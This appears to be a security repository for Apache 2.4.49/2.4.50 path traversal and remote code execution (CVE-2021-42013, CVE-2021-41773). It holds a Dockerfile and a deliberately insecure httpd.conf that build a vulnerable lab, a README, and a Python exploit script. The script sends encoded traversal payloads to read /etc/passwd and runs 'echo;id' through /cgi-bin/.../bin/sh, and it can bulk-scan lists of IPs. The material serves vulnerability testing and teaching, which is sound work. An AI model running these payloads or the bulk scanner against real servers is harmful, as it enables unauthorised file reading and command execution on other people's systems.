├── Dockerfile
├── README.md
├── cve-2021-42013.py
└── httpd.conf
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:20.04
2 | RUN apt-get update
3 | RUN apt-get install wget curl make gcc perl -y
4 | RUN apt-get install libapr1-dev libaprutil1-dev libpcre3-dev -y
5 | RUN wget https://archive.apache.org/dist/httpd/httpd-2.4.50.tar.gz
6 | RUN tar -xf httpd-2.4.50.tar.gz
7 | RUN ./httpd-2.4.50/configure --prefix=/
8 | RUN make && make install
9 | ADD httpd.conf /conf/httpd.conf
10 | RUN apachectl -k start
11 | ENTRYPOINT exec httpd -D "FOREGROUND"
12 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Apache 2.4.50 - Path Traversal or Remote Code Execution
2 | CVE-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in [Apache 2.4.50](https://archive.apache.org/dist/httpd/httpd-2.4.50.tar.gz). Vulnerable instance of Docker is provided to get your hands dirty on [CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013)
3 |
4 | If CGI-BIN is enabled than, we can perform Remote Code Execution but not Path Traversal, so "icons" directory has been added under Alias section in httpd.conf for checking Path Traversal vulnerability.
5 |
6 | # Vulnerable Configurations in httpd.conf
7 | ```
8 | 1. Enable CGI-BIN
9 | 2. Add "icons" directory in Alias section
10 | 3. Require all granted
11 | ```
12 |
13 | # Lab for CVE-2021-42013
14 | ### Build Docker
15 | ```
16 | $ docker build -t cve-2021-42013 .
17 | ```
18 | ### Run Docker
19 | ```
20 | $ docker run -it cve-2021-42013
21 | ```
22 |
23 | # Usage cve-2021-42013.py
24 | ### Check for Path Traversal and Remote Code Execution
25 | ```
26 | $ python3 cve-2021-42013.py -u http://172.17.0.2
27 | ```
28 |
29 | ### Path Traversal PoC
30 | ```
31 | $ python3 cve-2021-42013.py -u http://172.17.0.2 -pt
32 | ```
33 |
34 | ### Remote Code Execution PoC
35 | ```
36 | $ python3 cve-2021-42013.py -u http://172.17.0.2 -rce
37 | ```
38 |
39 | ### For bulk scanning, provide a text file containing IPs:
40 | ```
41 | $ python3 cve-2021-42013.py -l list.txt
42 | ```
43 | ```
44 | $ python3 cve-2021-42013.py -l list.txt -pt
45 | ```
46 | ```
47 | $ python3 cve-2021-42013.py -l list.txt -rce
48 | ```
49 |
50 | More information can be found [here](https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/).
51 |
52 | ### References
53 | * https://nvd.nist.gov/vuln/detail/CVE-2021-42013
54 | * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
55 | * https://www.cve.org/CVERecord?id=CVE-2021-42013
56 | * https://httpd.apache.org/security/vulnerabilities_24.html
57 | * https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/
58 |
--------------------------------------------------------------------------------
/cve-2021-42013.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | CVE: 2021-42013
5 | Tested on: 2.4.49 and 2.4.50
6 | Description: Path Traversal or Remote Code Execution vulnerabilities were found in Apache 2.4.49 and 2.4.50
7 | Script Author: @nirav4peace
8 | Company: Walnut Security Services Pvt. Ltd.
9 | Website: https://walnutsecurity.com
10 | '''
11 |
12 | import os
13 | import sys
14 | import requests
15 | import argparse
16 | import urllib
17 | from os import path
18 |
19 | #User-Agent
20 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
21 |
22 | #Usage Instructions
23 | usage = "\n- cve-2021-42013.py -u domain.com\n- cve-2021-42013.py -u domain.com -pt\n- cve-2021-42013.py -u domain.com -rce"
24 | description = "cve-2021-42013.py is a python script to check for Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50"
25 |
26 | #Arguments Parser
27 | parser = argparse.ArgumentParser(usage=usage, description=description)
28 | parser.add_argument("-u", dest="url", type=str, help="Specify a domain/ip to scan for CVE-2021-42013.")
29 | parser.add_argument("-pt", dest="pt", action="store_true", help="This will check only for Path Traversal vulnerability.")
30 | parser.add_argument("-rce", dest="rce", action="store_true", help="This will check only for Remote Code Execution vulnerability.")
31 | parser.add_argument("-l", dest="list", help="Specify a file to bulk scan for CVE-2021-42013.")
32 | args = parser.parse_args()
33 |
34 | vuln_ind = 0
35 |
36 | #Check for valid URL format and connectivity
37 | def urlCheck(url):
38 | try:
39 | try:
40 | try:
41 | try:
42 | try:
43 | resp = requests.head(url, headers={"User-Agent": user_agent})
44 | return resp
45 | except requests.exceptions.InvalidURL:
46 | print ("\n[-] Provided URL is invalid. Please specify valid URL.\n")
47 | sys.exit()
48 | except requests.exceptions.InvalidSchema:
49 | print ("\n[-] You have provided wrong protocol in "+url+", it must be (http:// or https://)\n")
50 | sys.exit()
51 | except requests.exceptions.MissingSchema:
52 | print ("\n[-] You need to specify protocol (http:// or https://) in "+url+"\n")
53 | sys.exit()
54 | except requests.exceptions.ReadTimeout:
55 | print ("\n[-] Server has not responded within 10s for the domain "+url+"\n")
56 | sys.exit()
57 | except requests.exceptions.ConnectionError:
58 | print ("\n[-] Unable to connect to the domain "+url+"\n")
59 | sys.exit()
60 |
61 | def exploitPT(payload, cve_id):
62 | payload = url + urllib.parse.quote(payload, safe="/%")
63 | print ("[+] Executing payload "+payload)
64 | try:
65 | request = urllib.request.Request(payload, headers={"User-Agent": user_agent})
66 | response = urllib.request.urlopen(request)
67 | res = response.read().decode("utf-8")
68 | if "root:" in res:
69 | print ("[!] "+url+" is vulnerable to Path Traversal Attack ("+cve_id+")")
70 | print ("[+] Response:")
71 | print (res)
72 | global vuln_ind
73 | vuln_ind =+ 1
74 | else:
75 | print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
76 | except urllib.error.HTTPError:
77 | print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
78 |
79 | def exploitRCE(payload, cve_id):
80 | payload = url + urllib.parse.quote(payload, safe="/%")
81 | data = "echo;id"
82 | data = data.encode("ascii")
83 | print ("[+] Executing payload "+payload)
84 | try:
85 | request = urllib.request.Request(payload, data=data, headers={"User-Agent": user_agent})
86 | response = urllib.request.urlopen(request)
87 | res = response.read().decode("utf-8")
88 | if "uid=" in res:
89 | print ("[!] "+url+" is vulnerable to Remote Code Execution attack ("+cve_id+")")
90 | print ("[+] Response:")
91 | print (res)
92 | else:
93 | print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
94 | except urllib.error.HTTPError:
95 | print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
96 |
97 | def pathTraversal(url):
98 | resp = urlCheck(url)
99 | version = resp.headers['server']
100 | if "49" in version:
101 | cve_id = "CVE-2021-41773"
102 | payload = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
103 | exploitPT(payload, cve_id)
104 |
105 | elif "50" in version:
106 | cve_id = "CVE-2021-42013"
107 | payload = "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
108 | exploitPT(payload, cve_id)
109 |
110 | else:
111 | cve_id = "CVE-2021-41773"
112 | payload = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
113 | exploitPT(payload, cve_id)
114 | if vuln_ind == 0:
115 | cve_id = "CVE-2021-42013"
116 | payload = "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
117 | exploitPT(payload, cve_id)
118 |
119 | def RCE(url):
120 | resp = urlCheck(url)
121 | version = resp.headers['server']
122 | if "49" in version:
123 | cve_id = "CVE-2021-41773"
124 | payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
125 | exploitRCE(payload, cve_id)
126 |
127 | elif "50" in version:
128 | cve_id = "CVE-2021-42013"
129 | payload = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"
130 | exploitRCE(payload, cve_id)
131 |
132 | else:
133 | cve_id = "CVE-2021-41773"
134 | payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
135 | exploitRCE(payload, cve_id)
136 | if vuln_ind == 0:
137 | cve_id = "CVE-2021-42013"
138 | payload = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"
139 | exploitRCE(payload, cve_id)
140 |
141 | def execute(url):
142 | ind=0
143 | if args.pt:
144 | pathTraversal(url)
145 | ind = 1
146 | if args.rce:
147 | RCE(url)
148 | ind = 1
149 | if ind == 0:
150 | pathTraversal(url)
151 | RCE(url)
152 |
153 | if args.url and args.list:
154 | print("[-] Specify only one parameter '-u' or '-l'")
155 |
156 | elif args.url:
157 | url = args.url
158 | execute(url)
159 |
160 | elif args.list:
161 | if not os.path.exists(args.list):
162 | print ("\n[-] No such list found in the given path.\n")
163 | sys.exit()
164 | lists = open(args.list).read().splitlines()
165 | for url in lists:
166 | execute(url)
167 | else:
168 | print("[-] No parameters given. Please see help by '-h'\n")
169 | sys.exit()
170 |
--------------------------------------------------------------------------------
/httpd.conf:
--------------------------------------------------------------------------------
1 | #
2 | # This is the main Apache HTTP server configuration file. It contains the
3 | # configuration directives that give the server its instructions.
4 | # See for detailed information.
5 | # In particular, see
6 | #
7 | # for a discussion of each configuration directive.
8 | #
9 | # Do NOT simply read the instructions in here without understanding
10 | # what they do. They're here only as hints or reminders. If you are unsure
11 | # consult the online docs. You have been warned.
12 | #
13 | # Configuration and logfile names: If the filenames you specify for many
14 | # of the server's control files begin with "/" (or "drive:/" for Win32), the
15 | # server will use that explicit path. If the filenames do *not* begin
16 | # with "/", the value of ServerRoot is prepended -- so "logs/access_log"
17 | # with ServerRoot set to "/usr/local/apache2" will be interpreted by the
18 | # server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"
19 | # will be interpreted as '/logs/access_log'.
20 |
21 | #
22 | # ServerRoot: The top of the directory tree under which the server's
23 | # configuration, error, and log files are kept.
24 | #
25 | # Do not add a slash at the end of the directory path. If you point
26 | # ServerRoot at a non-local disk, be sure to specify a local disk on the
27 | # Mutex directive, if file-based mutexes are used. If you wish to share the
28 | # same ServerRoot for multiple httpd daemons, you will need to change at
29 | # least PidFile.
30 | #
31 | ServerRoot "/"
32 |
33 | #
34 | # Mutex: Allows you to set the mutex mechanism and mutex file directory
35 | # for individual mutexes, or change the global defaults
36 | #
37 | # Uncomment and change the directory if mutexes are file-based and the default
38 | # mutex file directory is not on a local disk or is not appropriate for some
39 | # other reason.
40 | #
41 | # Mutex default:logs
42 |
43 | #
44 | # Listen: Allows you to bind Apache to specific IP addresses and/or
45 | # ports, instead of the default. See also the
46 | # directive.
47 | #
48 | # Change this to Listen on specific IP addresses as shown below to
49 | # prevent Apache from glomming onto all bound IP addresses.
50 | #
51 | #Listen 12.34.56.78:80
52 | Listen 80
53 |
54 | #
55 | # Dynamic Shared Object (DSO) Support
56 | #
57 | # To be able to use the functionality of a module which was built as a DSO you
58 | # have to place corresponding `LoadModule' lines at this location so the
59 | # directives contained in it are actually available _before_ they are used.
60 | # Statically compiled modules (those listed by `httpd -l') do not need
61 | # to be loaded here.
62 | #
63 | # Example:
64 | # LoadModule foo_module modules/mod_foo.so
65 | #
66 | LoadModule authn_file_module modules/mod_authn_file.so
67 | #LoadModule authn_dbm_module modules/mod_authn_dbm.so
68 | #LoadModule authn_anon_module modules/mod_authn_anon.so
69 | #LoadModule authn_dbd_module modules/mod_authn_dbd.so
70 | #LoadModule authn_socache_module modules/mod_authn_socache.so
71 | LoadModule authn_core_module modules/mod_authn_core.so
72 | LoadModule authz_host_module modules/mod_authz_host.so
73 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
74 | LoadModule authz_user_module modules/mod_authz_user.so
75 | #LoadModule authz_dbm_module modules/mod_authz_dbm.so
76 | #LoadModule authz_owner_module modules/mod_authz_owner.so
77 | #LoadModule authz_dbd_module modules/mod_authz_dbd.so
78 | LoadModule authz_core_module modules/mod_authz_core.so
79 | #LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
80 | LoadModule access_compat_module modules/mod_access_compat.so
81 | LoadModule auth_basic_module modules/mod_auth_basic.so
82 | #LoadModule auth_form_module modules/mod_auth_form.so
83 | #LoadModule auth_digest_module modules/mod_auth_digest.so
84 | #LoadModule allowmethods_module modules/mod_allowmethods.so
85 | #LoadModule file_cache_module modules/mod_file_cache.so
86 | #LoadModule cache_module modules/mod_cache.so
87 | #LoadModule cache_disk_module modules/mod_cache_disk.so
88 | #LoadModule cache_socache_module modules/mod_cache_socache.so
89 | #LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
90 | #LoadModule socache_dbm_module modules/mod_socache_dbm.so
91 | #LoadModule socache_memcache_module modules/mod_socache_memcache.so
92 | #LoadModule socache_redis_module modules/mod_socache_redis.so
93 | #LoadModule watchdog_module modules/mod_watchdog.so
94 | #LoadModule macro_module modules/mod_macro.so
95 | #LoadModule dbd_module modules/mod_dbd.so
96 | #LoadModule dumpio_module modules/mod_dumpio.so
97 | #LoadModule buffer_module modules/mod_buffer.so
98 | #LoadModule ratelimit_module modules/mod_ratelimit.so
99 | LoadModule reqtimeout_module modules/mod_reqtimeout.so
100 | #LoadModule ext_filter_module modules/mod_ext_filter.so
101 | #LoadModule request_module modules/mod_request.so
102 | #LoadModule include_module modules/mod_include.so
103 | LoadModule filter_module modules/mod_filter.so
104 | #LoadModule substitute_module modules/mod_substitute.so
105 | #LoadModule sed_module modules/mod_sed.so
106 | LoadModule mime_module modules/mod_mime.so
107 | #LoadModule ldap_module modules/mod_ldap.so
108 | LoadModule log_config_module modules/mod_log_config.so
109 | #LoadModule log_debug_module modules/mod_log_debug.so
110 | #LoadModule logio_module modules/mod_logio.so
111 | LoadModule env_module modules/mod_env.so
112 | #LoadModule expires_module modules/mod_expires.so
113 | LoadModule headers_module modules/mod_headers.so
114 | #LoadModule unique_id_module modules/mod_unique_id.so
115 | LoadModule setenvif_module modules/mod_setenvif.so
116 | LoadModule version_module modules/mod_version.so
117 | #LoadModule remoteip_module modules/mod_remoteip.so
118 | #LoadModule proxy_module modules/mod_proxy.so
119 | #LoadModule proxy_connect_module modules/mod_proxy_connect.so
120 | #LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
121 | #LoadModule proxy_http_module modules/mod_proxy_http.so
122 | #LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
123 | #LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
124 | #LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so
125 | #LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so
126 | #LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
127 | #LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
128 | #LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
129 | #LoadModule proxy_express_module modules/mod_proxy_express.so
130 | #LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so
131 | #LoadModule session_module modules/mod_session.so
132 | #LoadModule session_cookie_module modules/mod_session_cookie.so
133 | #LoadModule session_crypto_module modules/mod_session_crypto.so
134 | #LoadModule session_dbd_module modules/mod_session_dbd.so
135 | #LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
136 | #LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
137 | #LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so
138 | #LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
139 | #LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
140 | LoadModule unixd_module modules/mod_unixd.so
141 | #LoadModule dav_module modules/mod_dav.so
142 | LoadModule status_module modules/mod_status.so
143 | LoadModule autoindex_module modules/mod_autoindex.so
144 | #LoadModule info_module modules/mod_info.so
145 | LoadModule cgid_module modules/mod_cgid.so
146 | #LoadModule dav_fs_module modules/mod_dav_fs.so
147 | #LoadModule vhost_alias_module modules/mod_vhost_alias.so
148 | #LoadModule negotiation_module modules/mod_negotiation.so
149 | LoadModule dir_module modules/mod_dir.so
150 | #LoadModule actions_module modules/mod_actions.so
151 | #LoadModule speling_module modules/mod_speling.so
152 | #LoadModule userdir_module modules/mod_userdir.so
153 | LoadModule alias_module modules/mod_alias.so
154 | #LoadModule rewrite_module modules/mod_rewrite.so
155 |
156 |
157 | #
158 | # If you wish httpd to run as a different user or group, you must run
159 | # httpd as root initially and it will switch.
160 | #
161 | # User/Group: The name (or #number) of the user/group to run httpd as.
162 | # It is usually good practice to create a dedicated user and group for
163 | # running httpd, as with most system services.
164 | #
165 | User daemon
166 | Group daemon
167 |
168 |
169 |
170 | # 'Main' server configuration
171 | #
172 | # The directives in this section set up the values used by the 'main'
173 | # server, which responds to any requests that aren't handled by a
174 | # definition. These values also provide defaults for
175 | # any containers you may define later in the file.
176 | #
177 | # All of these directives may appear inside containers,
178 | # in which case these default settings will be overridden for the
179 | # virtual host being defined.
180 | #
181 |
182 | #
183 | # ServerAdmin: Your address, where problems with the server should be
184 | # e-mailed. This address appears on some server-generated pages, such
185 | # as error documents. e.g. admin@your-domain.com
186 | #
187 | ServerAdmin you@example.com
188 |
189 | #
190 | # ServerName gives the name and port that the server uses to identify itself.
191 | # This can often be determined automatically, but we recommend you specify
192 | # it explicitly to prevent problems during startup.
193 | #
194 | # If your host doesn't have a registered DNS name, enter its IP address here.
195 | #
196 | #ServerName www.example.com:80
197 |
198 | #
199 | # Deny access to the entirety of your server's filesystem. You must
200 | # explicitly permit access to web content directories in other
201 | # blocks below.
202 | #
203 |
204 | AllowOverride none
205 | Require all granted
206 |
207 |
208 | #
209 | # Note that from this point forward you must specifically allow
210 | # particular features to be enabled - so if something's not working as
211 | # you might expect, make sure that you have specifically enabled it
212 | # below.
213 | #
214 |
215 | #
216 | # DocumentRoot: The directory out of which you will serve your
217 | # documents. By default, all requests are taken from this directory, but
218 | # symbolic links and aliases may be used to point to other locations.
219 | #
220 | DocumentRoot "/htdocs"
221 |
222 | #
223 | # Possible values for the Options directive are "None", "All",
224 | # or any combination of:
225 | # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
226 | #
227 | # Note that "MultiViews" must be named *explicitly* --- "Options All"
228 | # doesn't give it to you.
229 | #
230 | # The Options directive is both complicated and important. Please see
231 | # http://httpd.apache.org/docs/2.4/mod/core.html#options
232 | # for more information.
233 | #
234 | Options Indexes FollowSymLinks
235 |
236 | #
237 | # AllowOverride controls what directives may be placed in .htaccess files.
238 | # It can be "All", "None", or any combination of the keywords:
239 | # AllowOverride FileInfo AuthConfig Limit
240 | #
241 | AllowOverride None
242 |
243 | #
244 | # Controls who can get stuff from this server.
245 | #
246 | Require all granted
247 |
248 |
249 | #
250 | # DirectoryIndex: sets the file that Apache will serve if a directory
251 | # is requested.
252 | #
253 |
254 | DirectoryIndex index.html
255 |
256 |
257 | #
258 | # The following lines prevent .htaccess and .htpasswd files from being
259 | # viewed by Web clients.
260 | #
261 |
262 | Require all denied
263 |
264 |
265 | #
266 | # ErrorLog: The location of the error log file.
267 | # If you do not specify an ErrorLog directive within a
268 | # container, error messages relating to that virtual host will be
269 | # logged here. If you *do* define an error logfile for a
270 | # container, that host's errors will be logged there and not here.
271 | #
272 | ErrorLog "logs/error_log"
273 |
274 | #
275 | # LogLevel: Control the number of messages logged to the error_log.
276 | # Possible values include: debug, info, notice, warn, error, crit,
277 | # alert, emerg.
278 | #
279 | LogLevel warn
280 |
281 |
282 | #
283 | # The following directives define some format nicknames for use with
284 | # a CustomLog directive (see below).
285 | #
286 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
287 | LogFormat "%h %l %u %t \"%r\" %>s %b" common
288 |
289 |
290 | # You need to enable mod_logio.c to use %I and %O
291 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
292 |
293 |
294 | #
295 | # The location and format of the access logfile (Common Logfile Format).
296 | # If you do not define any access logfiles within a
297 | # container, they will be logged here. Contrariwise, if you *do*
298 | # define per- access logfiles, transactions will be
299 | # logged therein and *not* in this file.
300 | #
301 | CustomLog "logs/access_log" common
302 |
303 | #
304 | # If you prefer a logfile with access, agent, and referer information
305 | # (Combined Logfile Format) you can use the following directive.
306 | #
307 | #CustomLog "logs/access_log" combined
308 |
309 |
310 |
311 | #
312 | # Redirect: Allows you to tell clients about documents that used to
313 | # exist in your server's namespace, but do not anymore. The client
314 | # will make a new request for the document at its new location.
315 | # Example:
316 | # Redirect permanent /foo http://www.example.com/bar
317 |
318 | #
319 | # Alias: Maps web paths into filesystem paths and is used to
320 | # access content that does not live under the DocumentRoot.
321 | # Example:
322 | # Alias /webpath /full/filesystem/path
323 | #
324 | # If you include a trailing / on /webpath then the server will
325 | # require it to be present in the URL. You will also likely
326 | # need to provide a section to allow access to
327 | # the filesystem path.
328 | Alias /icons /icons
329 |
330 | Require all granted
331 |
332 | #
333 | # ScriptAlias: This controls which directories contain server scripts.
334 | # ScriptAliases are essentially the same as Aliases, except that
335 | # documents in the target directory are treated as applications and
336 | # run by the server when requested rather than as documents sent to the
337 | # client. The same rules about trailing "/" apply to ScriptAlias
338 | # directives as to Alias.
339 | #
340 | ScriptAlias /cgi-bin/ "/cgi-bin/"
341 |
342 |
343 |
344 |
345 | #
346 | # ScriptSock: On threaded servers, designate the path to the UNIX
347 | # socket used to communicate with the CGI daemon of mod_cgid.
348 | #
349 | #Scriptsock cgisock
350 |
351 |
352 | #
353 | # "/cgi-bin" should be changed to whatever your ScriptAliased
354 | # CGI directory exists, if you have that configured.
355 | #
356 |
357 | AllowOverride None
358 | Options +ExecCGI
359 | Require all granted
360 |
361 |
362 |
363 | #
364 | # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
365 | # backend servers which have lingering "httpoxy" defects.
366 | # 'Proxy' request header is undefined by the IETF, not listed by IANA
367 | #
368 | RequestHeader unset Proxy early
369 |
370 |
371 |
372 | #
373 | # TypesConfig points to the file containing the list of mappings from
374 | # filename extension to MIME-type.
375 | #
376 | TypesConfig conf/mime.types
377 |
378 | #
379 | # AddType allows you to add to or override the MIME configuration
380 | # file specified in TypesConfig for specific file types.
381 | #
382 | #AddType application/x-gzip .tgz
383 | #
384 | # AddEncoding allows you to have certain browsers uncompress
385 | # information on the fly. Note: Not all browsers support this.
386 | #
387 | #AddEncoding x-compress .Z
388 | #AddEncoding x-gzip .gz .tgz
389 | #
390 | # If the AddEncoding directives above are commented-out, then you
391 | # probably should define those extensions to indicate media types:
392 | #
393 | AddType application/x-compress .Z
394 | AddType application/x-gzip .gz .tgz
395 |
396 | #
397 | # AddHandler allows you to map certain file extensions to "handlers":
398 | # actions unrelated to filetype. These can be either built into the server
399 | # or added with the Action directive (see below)
400 | #
401 | # To use CGI scripts outside of ScriptAliased directories:
402 | # (You will also need to add "ExecCGI" to the "Options" directive.)
403 | #
404 | #AddHandler cgi-script .cgi
405 |
406 | # For type maps (negotiated resources):
407 | #AddHandler type-map var
408 |
409 | #
410 | # Filters allow you to process content before it is sent to the client.
411 | #
412 | # To parse .shtml files for server-side includes (SSI):
413 | # (You will also need to add "Includes" to the "Options" directive.)
414 | #
415 | #AddType text/html .shtml
416 | #AddOutputFilter INCLUDES .shtml
417 |
418 |
419 | #
420 | # The mod_mime_magic module allows the server to use various hints from the
421 | # contents of the file itself to determine its type. The MIMEMagicFile
422 | # directive tells the module where the hint definitions are located.
423 | #
424 | #MIMEMagicFile conf/magic
425 |
426 | #
427 | # Customizable error responses come in three flavors:
428 | # 1) plain text 2) local redirects 3) external redirects
429 | #
430 | # Some examples:
431 | #ErrorDocument 500 "The server made a boo boo."
432 | #ErrorDocument 404 /missing.html
433 | #ErrorDocument 404 "/cgi-bin/missing_handler.pl"
434 | #ErrorDocument 402 http://www.example.com/subscription_info.html
435 | #
436 |
437 | #
438 | # MaxRanges: Maximum number of Ranges in a request before
439 | # returning the entire resource, or one of the special
440 | # values 'default', 'none' or 'unlimited'.
441 | # Default setting is to accept 200 Ranges.
442 | #MaxRanges unlimited
443 |
444 | #
445 | # EnableMMAP and EnableSendfile: On systems that support it,
446 | # memory-mapping or the sendfile syscall may be used to deliver
447 | # files. This usually improves server performance, but must
448 | # be turned off when serving from networked-mounted
449 | # filesystems or if support for these functions is otherwise
450 | # broken on your system.
451 | # Defaults: EnableMMAP On, EnableSendfile Off
452 | #
453 | #EnableMMAP off
454 | #EnableSendfile on
455 |
456 | # Supplemental configuration
457 | #
458 | # The configuration files in the conf/extra/ directory can be
459 | # included to add extra features or to modify the default configuration of
460 | # the server, or you may simply copy their contents here and change as
461 | # necessary.
462 |
463 | # Server-pool management (MPM specific)
464 | #Include conf/extra/httpd-mpm.conf
465 |
466 | # Multi-language error messages
467 | #Include conf/extra/httpd-multilang-errordoc.conf
468 |
469 | # Fancy directory listings
470 | #Include conf/extra/httpd-autoindex.conf
471 |
472 | # Language settings
473 | #Include conf/extra/httpd-languages.conf
474 |
475 | # User home directories
476 | #Include conf/extra/httpd-userdir.conf
477 |
478 | # Real-time info on requests and configuration
479 | #Include conf/extra/httpd-info.conf
480 |
481 | # Virtual hosts
482 | #Include conf/extra/httpd-vhosts.conf
483 |
484 | # Local access to the Apache HTTP Server Manual
485 | #Include conf/extra/httpd-manual.conf
486 |
487 | # Distributed authoring and versioning (WebDAV)
488 | #Include conf/extra/httpd-dav.conf
489 |
490 | # Various default settings
491 | #Include conf/extra/httpd-default.conf
492 |
493 | # Configure mod_proxy_html to understand HTML4/XHTML1
494 |
495 | Include conf/extra/proxy-html.conf
496 |
497 |
498 | # Secure (SSL/TLS) connections
499 | #Include conf/extra/httpd-ssl.conf
500 | #
501 | # Note: The following must must be present to support
502 | # starting without SSL on platforms with no /dev/random equivalent
503 | # but a statically compiled-in mod_ssl.
504 | #
505 |
506 | SSLRandomSeed startup builtin
507 | SSLRandomSeed connect builtin
508 |
509 |
510 |
--------------------------------------------------------------------------------